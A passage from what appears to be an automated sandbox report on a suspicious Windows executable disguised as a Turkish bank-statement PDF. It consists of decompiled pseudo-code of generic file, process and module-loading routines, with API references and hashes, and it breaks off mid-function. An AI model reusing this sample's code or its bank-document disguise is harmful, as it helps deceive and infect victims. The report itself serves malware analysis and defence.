                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                  • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                  • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                  • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E00403479(intOrPtr _a4) {
                                                  				intOrPtr _t11;
                                                  				signed int _t12;
                                                  				void* _t14;
                                                  				void* _t15;
                                                  				long _t16;
                                                  				void* _t18;
                                                  				intOrPtr _t31;
                                                  				intOrPtr _t34;
                                                  				void* _t37;
                                                  
                                                  				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                                  				 *0x42a26c = GetTickCount() + 0x1f4;
                                                  				if(_t34 <= 0) {
                                                  					L22:
                                                  					E0040302E(1);
                                                  					return 0;
                                                  				}
                                                  				E004035F8( *0x420f04);
                                                  				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                  				 *0x420f00 = _t34;
                                                  				 *0x420ef0 = 0;
                                                  				while(1) {
                                                  					_t31 = 0x4000;
                                                  					_t11 =  *0x420ef8 -  *0x420f04;
                                                  					if(_t11 <= 0x4000) {
                                                  						_t31 = _t11;
                                                  					}
                                                  					_t12 = E004035E2(0x414ef0, _t31);
                                                  					if(_t12 == 0) {
                                                  						break;
                                                  					}
                                                  					 *0x420f04 =  *0x420f04 + _t31;
                                                  					 *0x40ce80 = 0x414ef0;
                                                  					 *0x40ce84 = _t31;
                                                  					L6:
                                                  					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                  						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                  						E0040302E(0);
                                                  					}
                                                  					 *0x40ce88 = 0x40cef0;
                                                  					 *0x40ce8c = 0x8000; // executed
                                                  					_t14 = E00406BB0(0x40ce68); // executed
                                                  					if(_t14 < 0) {
                                                  						goto L20;
                                                  					}
                                                  					_t37 =  *0x40ce88 - 0x40cef0;
                                                  					if(_t37 == 0) {
                                                  						if( *0x40ce84 != 0 || _t31 == 0) {
                                                  							goto L20;
                                                  						} else {
                                                  							L16:
                                                  							_t16 =  *0x420ef4;
                                                  							if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                  								continue;
                                                  							}
                                                  							SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                  					if(_t18 == 0) {
                                                  						_push(0xfffffffe);
                                                  						L21:
                                                  						_pop(_t15);
                                                  						return _t15;
                                                  					}
                                                  					 *0x40ce60 =  *0x40ce60 + _t37;
                                                  					if( *0x40ce84 != 0) {
                                                  						goto L6;
                                                  					}
                                                  					goto L16;
                                                  					L20:
                                                  					_push(0xfffffffd);
                                                  					goto L21;
                                                  				}
                                                  				return _t12 | 0xffffffff;
                                                  			}













                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040348D
                                                    • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID:
                                                  • API String ID: 1092082344-0
                                                  • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                  • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                  • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                  • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 41%
                                                  			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                                                  				int _t9;
                                                  				long _t13;
                                                  				WCHAR* _t14;
                                                  
                                                  				_t14 = _a4;
                                                  				_t13 = E00406133(_t14);
                                                  				if(_t13 == 0xffffffff) {
                                                  					L8:
                                                  					return 0;
                                                  				}
                                                  				_push(_t14);
                                                  				if((_a8 & 0x00000001) == 0) {
                                                  					_t9 = DeleteFileW();
                                                  				} else {
                                                  					_t9 = RemoveDirectoryW(); // executed
                                                  				}
                                                  				if(_t9 == 0) {
                                                  					if((_a8 & 0x00000004) == 0) {
                                                  						SetFileAttributesW(_t14, _t13);
                                                  					}
                                                  					goto L8;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}






                                                  APIs
                                                    • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                    • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                  • String ID:
                                                  • API String ID: 1655745494-0
                                                  • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                  • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                  • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                  • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406AE0(void* __ecx, void* _a4) {
                                                  				long _v8;
                                                  				long _t6;
                                                  
                                                  				_t6 = WaitForSingleObject(_a4, 0x64);
                                                  				while(_t6 == 0x102) {
                                                  					E00406A71(0xf);
                                                  					_t6 = WaitForSingleObject(_a4, 0x64);
                                                  				}
                                                  				GetExitCodeProcess(_a4,  &_v8); // executed
                                                  				return _v8;
                                                  			}





                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                  • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CodeExitProcess
                                                  • String ID:
                                                  • API String ID: 2567322000-0
                                                  • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                  • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                  • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                  • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                  				long _v8;
                                                  				long _t21;
                                                  				long _t22;
                                                  				void* _t24;
                                                  				long _t26;
                                                  				int _t27;
                                                  				long _t28;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				long _t31;
                                                  				long _t32;
                                                  				long _t36;
                                                  
                                                  				_t21 = _a4;
                                                  				if(_t21 >= 0) {
                                                  					_t32 = _t21 +  *0x42a2b8;
                                                  					 *0x420ef4 = _t32;
                                                  					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                  				}
                                                  				_t22 = E00403479(4);
                                                  				if(_t22 >= 0) {
                                                  					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                  					if(_t24 == 0) {
                                                  						L18:
                                                  						_push(0xfffffffd);
                                                  						goto L19;
                                                  					} else {
                                                  						 *0x420ef4 =  *0x420ef4 + 4;
                                                  						_t36 = E00403479(_a4);
                                                  						if(_t36 < 0) {
                                                  							L21:
                                                  							_t22 = _t36;
                                                  						} else {
                                                  							if(_a12 != 0) {
                                                  								_t26 = _a4;
                                                  								if(_t26 >= _a16) {
                                                  									_t26 = _a16;
                                                  								}
                                                  								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                  								if(_t27 != 0) {
                                                  									_t36 = _v8;
                                                  									 *0x420ef4 =  *0x420ef4 + _t36;
                                                  									goto L21;
                                                  								} else {
                                                  									goto L18;
                                                  								}
                                                  							} else {
                                                  								if(_a4 <= 0) {
                                                  									goto L21;
                                                  								} else {
                                                  									while(1) {
                                                  										_t28 = _a4;
                                                  										if(_a4 >= 0x4000) {
                                                  											_t28 = 0x4000;
                                                  										}
                                                  										_v8 = _t28;
                                                  										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                  										if(_t29 == 0) {
                                                  											goto L18;
                                                  										}
                                                  										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                  										if(_t30 == 0) {
                                                  											_push(0xfffffffe);
                                                  											L19:
                                                  											_pop(_t22);
                                                  										} else {
                                                  											_t31 = _v8;
                                                  											_a4 = _a4 - _t31;
                                                  											 *0x420ef4 =  *0x420ef4 + _t31;
                                                  											_t36 = _t36 + _t31;
                                                  											if(_a4 > 0) {
                                                  												continue;
                                                  											} else {
                                                  												goto L21;
                                                  											}
                                                  										}
                                                  										goto L22;
                                                  									}
                                                  									goto L18;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				L22:
                                                  				return _t22;
                                                  			}















                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                  • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                  • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                  • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
                                                  				intOrPtr* _t6;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  				signed int _t11;
                                                  				void* _t12;
                                                  				signed int _t16;
                                                  				signed int _t17;
                                                  				void* _t18;
                                                  
                                                  				_t17 = _a4;
                                                  				while(_t17 >= 0) {
                                                  					_t6 = _t17 * 0x1c +  *0x42a290;
                                                  					if( *_t6 == 1) {
                                                  						break;
                                                  					}
                                                  					_push(_t6); // executed
                                                  					_t8 = E00401434(); // executed
                                                  					if(_t8 == 0x7fffffff) {
                                                  						return 0x7fffffff;
                                                  					}
                                                  					_t10 = E0040136D(_t8);
                                                  					if(_t10 != 0) {
                                                  						_t11 = _t10 - 1;
                                                  						_t16 = _t17;
                                                  						_t17 = _t11;
                                                  						_t12 = _t11 - _t16;
                                                  					} else {
                                                  						_t12 = _t10 + 1;
                                                  						_t17 = _t17 + 1;
                                                  					}
                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                  						 *0x42924c =  *0x42924c + _t12;
                                                  						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}











                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405C4B(WCHAR* _a4) {
                                                  				struct _PROCESS_INFORMATION _v20;
                                                  				int _t7;
                                                  
                                                  				0x426750->cb = 0x44;
                                                  				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                  				if(_t7 != 0) {
                                                  					CloseHandle(_v20.hThread);
                                                  					return _v20.hProcess;
                                                  				}
                                                  				return _t7;
                                                  			}






                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406A35(signed int _a4) {
                                                  				struct HINSTANCE__* _t5;
                                                  				signed int _t10;
                                                  
                                                  				_t10 = _a4 << 3;
                                                  				_t8 =  *(_t10 + 0x40a410);
                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                  				if(_t5 != 0) {
                                                  					L2:
                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                  				}
                                                  				_t5 = E004069C5(_t8); // executed
                                                  				if(_t5 == 0) {
                                                  					return 0;
                                                  				}
                                                  				goto L2;
                                                  			}






                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                    • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                    • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                    • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                  				signed int _t5;
                                                  				void* _t6;
                                                  
                                                  				_t5 = GetFileAttributesW(_a4); // executed
                                                  				asm("sbb ecx, ecx");
                                                  				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                  				return _t6;
                                                  			}






                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406133(WCHAR* _a4) {
                                                  				signed char _t3;
                                                  				signed char _t7;
                                                  
                                                  				_t3 = GetFileAttributesW(_a4); // executed
                                                  				_t7 = _t3;
                                                  				if(_t7 != 0xffffffff) {
                                                  					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                  				}
                                                  				return _t7;
                                                  			}






                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405C16(WCHAR* _a4) {
                                                  				int _t2;
                                                  
                                                  				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				return 0;
                                                  			}





                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                  • GetLastError.KERNEL32 ref: 00405C2A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040620A(void* _a4, void* _a8, long _a12) {
                                                  				int _t7;
                                                  				long _t11;
                                                  
                                                  				_t11 = _a12;
